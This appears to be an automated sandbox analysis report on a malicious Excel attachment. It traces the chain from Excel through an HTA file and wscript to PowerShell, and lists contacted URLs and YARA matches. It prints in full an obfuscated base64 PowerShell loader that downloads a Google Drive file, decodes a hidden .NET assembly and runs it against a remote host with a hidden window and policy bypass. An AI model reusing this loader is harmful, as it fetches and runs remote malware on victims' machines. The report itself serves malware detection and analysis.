          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: mshta.exe, 00000004.00000002.433099624.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430875970.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: mshta.exe, 00000004.00000002.433099624.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430875970.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: powershell.exe, 00000005.00000002.457385625.000000000358E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
          Source: powershell.exe, 00000005.00000002.460380386.0000000012201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: mshta.exe, 00000004.00000002.433099624.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430875970.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: powershell.exe, 00000005.00000002.457385625.00000000021D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.511359477.0000000002531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.484734219.00000000020B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.545987479.0000000002461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: mshta.exe, 00000004.00000002.433099624.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433061413.000000000310B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430875970.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470008641.00000000004AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476212495.00000000004AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476765647.00000000004AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/
          Source: mshta.exe, 0000000F.00000003.470008641.00000000004AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476212495.00000000004AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476765647.00000000004AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/6
          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/_
          Source: mshta.exe, 00000004.00000002.432507010.000000000044F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.432507010.0000000000499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430232100.00000000004BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470008641.0000000000465000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476765647.0000000000496000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476744420.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476212495.0000000000496000.00000004.00000020.00020000.00000000.sdmp, PO.2407010.xls, 20430000.0.drString found in binary or memory: https://acesso.run/ll2rdE?&moustache=historical&spade=lonely&father
          Source: mshta.exe, 0000000F.00000002.476744420.00000000003FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/ll2rdE?&moustache=historical&spade=lonely&fatherF#
          Source: mshta.exe, 0000000F.00000003.470008641.0000000000465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/ll2rdE?&moustache=historical&spade=lonely&fatherW
          Source: mshta.exe, 00000004.00000002.432507010.000000000044F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/ll2rdE?&moustache=historical&spade=lonely&fatherm
          Source: mshta.exe, 00000004.00000002.432507010.000000000044F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/ll2rdE?&moustache=historical&spade=lonely&fathert
          Source: powershell.exe, 00000005.00000002.460380386.0000000012201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000005.00000002.460380386.0000000012201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000005.00000002.460380386.0000000012201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 0000000E.00000002.511359477.0000000002732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.545987479.0000000002662000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
          Source: powershell.exe, 0000001A.00000002.545987479.0000000002461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.544220667.00000000001DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
          Source: powershell.exe, 0000000E.00000002.511359477.00000000028F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.545987479.0000000002827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
          Source: powershell.exe, 0000000E.00000002.511359477.00000000028F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.545987479.0000000002827000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
          Source: powershell.exe, 00000005.00000002.460380386.0000000012201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
          Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
          Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
          Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
          Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49172 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49171 version: TLS 1.2
          Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
          Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: Process Memory Space: powershell.exe PID: 4092, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Excel sheet contains many unusual embedded objects
          Source: PO.2407010.xlsOLE: Microsoft Excel 2007+
          Source: 20430000.0.drOLE: Microsoft Excel 2007+
          Microsoft Office drops suspicious files
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatthingswithmegood[1].htaJump to behavior
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk